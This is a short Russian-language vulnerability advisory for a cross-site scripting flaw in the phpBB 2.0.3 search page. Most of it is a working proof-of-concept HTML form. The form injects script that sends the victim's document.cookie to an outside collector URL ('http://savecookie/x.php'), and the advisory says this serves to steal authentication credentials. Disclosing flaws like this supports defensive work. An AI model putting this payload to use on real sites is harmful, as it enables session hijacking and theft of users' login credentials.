phpBB — популярная доска объявлений для UNIX и Windows систем. Из-за недостаточной фильтрации ввода пользователя, удаленный атакующий может внедрить произвольный код сценария в сгенерированную страницу поиска. Уязвимость может использоваться для кражи опознавательных мандатов, хранящихся в куки. Пример: 

<html> 
<body> 
<form method=»post» name=»search» 
action=»http://target/search.php?mode=searchuser»> 
<input type=»hidden» name=»search_username» value=»»/> 

</form> 
<SCRIPT> 
search.search_username.value=’Http://savecookie/x.php?Cookie=»><script>location=search.search_username.value+document.cookie;</script\>’; 
document.search.submit(); 
</script> 
</body> 
</html> 

Уязвимость обнаружена в phpBB 2.0.3.



Оставить мнение